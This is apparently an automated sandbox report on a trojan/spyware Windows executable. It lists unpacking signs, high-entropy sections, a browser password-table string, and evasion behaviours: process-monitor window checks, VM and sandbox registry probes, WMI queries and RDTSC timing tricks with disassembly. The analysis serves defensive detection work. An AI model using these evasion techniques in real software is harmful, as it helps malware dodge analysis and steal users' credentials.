                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0049C4000_2_0049C400
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0048C4050_2_0048C405
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004634120_2_00463412
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004DF4150_2_004DF415
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0046941D0_2_0046941D
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0044441B0_2_0044441B
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0049D42B0_2_0049D42B
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004534260_2_00453426
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0048D4260_2_0048D426
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004414370_2_00441437
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004D94390_2_004D9439
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0049443E0_2_0049443E
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004974CD0_2_004974CD
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004004C60_2_004004C6
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004554C90_2_004554C9
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004024E00_2_004024E0
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004434E50_2_004434E5
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004D44E90_2_004D44E9
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004544EA0_2_004544EA
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004C44F10_2_004C44F1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004AD4F50_2_004AD4F5
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0048448C0_2_0048448C
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004DB4810_2_004DB481
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_003ED4F30_2_003ED4F3
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004AE4870_2_004AE487
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004834980_2_00483498
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004CD4980_2_004CD498
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0045B4930_2_0045B493
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0047B4A70_2_0047B4A7
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004565450_2_00456545
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004BE54F0_2_004BE54F
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004A15420_2_004A1542
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004615510_2_00461551
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0047F55D0_2_0047F55D
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004B65510_2_004B6551
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0046E5580_2_0046E558
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004045600_2_00404560
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0048F5680_2_0048F568
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004BF5640_2_004BF564
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0044A5740_2_0044A574
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004675700_2_00467570
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_004D05740_2_004D0574
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_0047057D0_2_0047057D
                Source: hx0wBsOjkQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hx0wBsOjkQ.exeStatic PE information: Section: ZLIB complexity 0.9996234170751634
                Source: hx0wBsOjkQ.exeStatic PE information: Section: lzvphivs ZLIB complexity 0.9948883056640625
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_2_00412070 CoCreateInstance,0_2_00412070
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541990140.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1519680206.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1541780338.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1519293770.00000000057E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: hx0wBsOjkQ.exeVirustotal: Detection: 53%
                Source: hx0wBsOjkQ.exeReversingLabs: Detection: 57%
                Source: hx0wBsOjkQ.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile read: C:\Users\user\Desktop\hx0wBsOjkQ.exeJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: hx0wBsOjkQ.exeStatic file information: File size 1810944 > 1048576
                Source: hx0wBsOjkQ.exeStatic PE information: Raw size of lzvphivs is bigger than: 0x100000 < 0x190000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeUnpacked PE file: 0.2.hx0wBsOjkQ.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzvphivs:EW;rnhdfjfr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzvphivs:EW;rnhdfjfr:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: hx0wBsOjkQ.exeStatic PE information: real checksum: 0x1bccd8 should be: 0x1c4328
                Source: hx0wBsOjkQ.exeStatic PE information: section name:
                Source: hx0wBsOjkQ.exeStatic PE information: section name: .idata
                Source: hx0wBsOjkQ.exeStatic PE information: section name:
                Source: hx0wBsOjkQ.exeStatic PE information: section name: lzvphivs
                Source: hx0wBsOjkQ.exeStatic PE information: section name: rnhdfjfr
                Source: hx0wBsOjkQ.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_057C7B9E push ebx; iretd 0_3_057C7BA9
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_057C7B9E push ebx; iretd 0_3_057C7BA9
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeCode function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: hx0wBsOjkQ.exeStatic PE information: section name: entropy: 7.978175791647224
                Source: hx0wBsOjkQ.exeStatic PE information: section name: lzvphivs entropy: 7.954180945897147

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 597396 second address: 59739A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 59739A second address: 5973A4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9E4B29216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5973A4 second address: 5973B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FB9E5277416h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5973B2 second address: 5973B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A339E second address: 5A33A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A33A2 second address: 5A33AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A33AF second address: 5A33D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E5277423h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007FB9E5277416h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A33D1 second address: 5A33EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29223h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A33EC second address: 5A340E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB9E5277425h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A3547 second address: 5A354B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A354B second address: 5A354F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5074 second address: 5A5078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5078 second address: 5A50B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB9E5277427h 0x0000000e pop edx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB9E5277428h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A50B7 second address: 5A50D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29220h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jne 00007FB9E4B29216h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A50D9 second address: 5A518E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E527741Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007FB9E527741Bh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a pop eax 0x0000001b cld 0x0000001c push 00000003h 0x0000001e mov cl, ah 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007FB9E5277418h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c cmc 0x0000003d push 00000003h 0x0000003f call 00007FB9E5277425h 0x00000044 jmp 00007FB9E527741Eh 0x00000049 pop esi 0x0000004a push 51894635h 0x0000004f jmp 00007FB9E527741Ah 0x00000054 add dword ptr [esp], 6E76B9CBh 0x0000005b mov edx, dword ptr [ebp+122D2C53h] 0x00000061 lea ebx, dword ptr [ebp+1243FEAAh] 0x00000067 pushad 0x00000068 xor cl, 0000000Dh 0x0000006b clc 0x0000006c popad 0x0000006d xchg eax, ebx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FB9E5277422h 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A518E second address: 5A5193 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5249 second address: 5A52A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB9E527741Fh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FB9E5277429h 0x00000012 pushad 0x00000013 jnp 00007FB9E5277416h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e mov dword ptr [ebp+122D2219h], esi 0x00000024 push 00000000h 0x00000026 call 00007FB9E527741Bh 0x0000002b xor di, C03Dh 0x00000030 pop esi 0x00000031 push E172C01Ah 0x00000036 push ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A52A8 second address: 5A5336 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 add dword ptr [esp], 1E8D4066h 0x0000000e mov ecx, dword ptr [ebp+122D279Ah] 0x00000014 push 00000003h 0x00000016 pushad 0x00000017 mov bh, ah 0x00000019 or di, B5A5h 0x0000001e popad 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007FB9E4B29218h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D3383h], eax 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007FB9E4B29218h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 00000017h 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d jmp 00007FB9E4B29224h 0x00000062 push 45BBB7CDh 0x00000067 push eax 0x00000068 push edx 0x00000069 push edi 0x0000006a jnl 00007FB9E4B29216h 0x00000070 pop edi 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5336 second address: 5A5347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E527741Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5448 second address: 5A544C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A544C second address: 5A5486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FB9E5277427h 0x00000010 jmp 00007FB9E5277427h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5486 second address: 5A5490 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9E4B2921Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5A5490 second address: 5A5515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 js 00007FB9E527741Ch 0x0000000d mov edi, dword ptr [ebp+122D27CEh] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D2244h], eax 0x0000001b push 99AB6461h 0x00000020 jmp 00007FB9E527741Ch 0x00000025 add dword ptr [esp], 66549C1Fh 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FB9E5277418h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D1C2Dh], eax 0x0000004c push 00000003h 0x0000004e mov ecx, 432D7525h 0x00000053 push 00000000h 0x00000055 and cx, 8EC4h 0x0000005a mov di, 777Bh 0x0000005e push 00000003h 0x00000060 mov dh, D9h 0x00000062 push 84253BD7h 0x00000067 push eax 0x00000068 push edx 0x00000069 je 00007FB9E527741Ch 0x0000006f jns 00007FB9E5277416h 0x00000075 rdtsc
